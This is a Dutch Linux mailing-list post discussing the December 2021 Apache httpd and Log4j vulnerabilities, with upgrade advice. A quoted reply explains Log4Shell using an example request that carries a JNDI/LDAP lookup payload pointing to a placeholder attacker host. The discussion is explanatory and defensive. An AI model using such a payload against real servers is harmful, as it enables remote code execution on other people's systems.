[linux] Apache probleem: wat moeten we doen?
paai
j.j.paijmans op gmail.com
Ma Dec 13 20:42:06 CET 2021
On 13-12-2021 20:19, Paul Slootman wrote:
> On Sun 12 Dec 2021, Daniel C. von Asmuth wrote:
>> Nu moeten we ons vooral afvragen om welk probleem met Apache het gaat?
>>
>> Paai suggereert dat hij de web server bedoelt. Het probleem vind je op:
>> https://httpd.apache.org/security/vulnerabilities_24.html
>> Oplossing: upgraden naar Apache 2.4.51.
>>
>> Of gaat het om het probleem met Apache Log4j, dat gisteren de Volkskrant
>> haalde? Veel Java server code is daar kwetsbaar voor:
>> https://www.zdnet.com/article/security-warning-new-zero-day-in-the-log4j-java-library-is-already-being-exploited/
>>
>> Oplossing: upgraden naar log4j-2.15.0-rc1.
> Waar alle drukte om gaat de laatste dagen gaat inderdaad om de logging
> tool voor java toepassingen.
>
> Als er b.v. de opgevraagde URL in een java applicatie slordig gelogd
> wordt (dus de URL wordt als log string gebruikt, ipv. een log string die
> een externe string invoegt) dan kan daarmee externe bronnen ingevoegd
> worden door b.v. http://example.com/${jndi:ldap://x.x.x.x:5555/ExploitD}/
> op te vragen. log4j gaat dan vrolijk via ldap die x.x.x. enz. opvragen,
> en als daar precies de juiste (foute) data klaarstaat dan kan je
> applicatie dus dingen gaan uitvoeren waar je geen controle over hebt.
>
> Ik ben (gelukkig?) geen java programmeur, maar bijzonder dat er
> blijkbaar behoefte is aan een heel pakket om voor wat logging te zorgen,
> wat in enorm veel java toepassingen ook gebruikt wordt. En dus bij
> kwetsbaarheden enorme gevolgen kan hebben. Teveel toeters en bellen
> ingebouwd? Waarom heeft een logging tool LDAP koppelingen nodig?!
>
>
> Paul
Samenvattend: de Linux hobbyist en thuisgebruiker met een vanilla Apache
hoeft zich dus niet meteen druk te maken.
(En het bevestigt mijn diepe afkeer van Java...)
Paai
Meer informatie over de Linux
maillijst